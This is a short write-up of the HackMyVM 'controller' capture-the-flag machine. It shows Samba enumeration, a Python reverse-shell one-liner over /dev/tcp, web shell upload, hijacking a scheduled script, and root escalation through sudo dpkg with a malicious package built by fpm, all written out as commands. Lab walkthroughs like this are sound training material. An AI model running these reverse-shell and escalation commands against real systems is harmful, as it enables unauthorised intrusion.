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hackmyvm: controller walkthrough
2022-08-02 03:59:00 【xdeclearn】
1. get first reverse shell
visit port 80, from the page
we get hint.
use enum4linux
to get samba shares, the we get the directory tester
which we can visit without user and passwd.
follow the hint, we put the text.txt using smbclient
in this share, wait a moment, we get first reverse shell.
import commands
commands.getoutput('/bin/bash -c "/bin/bash -i >& /dev/tcp/ 0>&1"')
2. get root
check process list, we can see the user webservies run php localhost.
we use the tool venom
to forward localhost port 8080 to attack machine port 8888.
upload a word shell by upload.php
because of thedisable_functions
, you can not use terminal directly. you can use php7_userfilter
to bypass. But in there, you do not need to do this.
check the file which own to user webservices
we find the /opt/logs/log.txt
will be changed by /opt/website.py
at intervals. so we change the file to reverse a new shell.
then, we get the new user shell.
check sudo -l
, we find the dpkg -i
[1]. make a particular deb by using fpm
, we get the root.
TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
3. references
- https://gtfobins.github.io/gtfobins/dpkg/
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- 解决 Zlibrary 卡死/找不到域名/达到限额问题,Zlibrary最新地址
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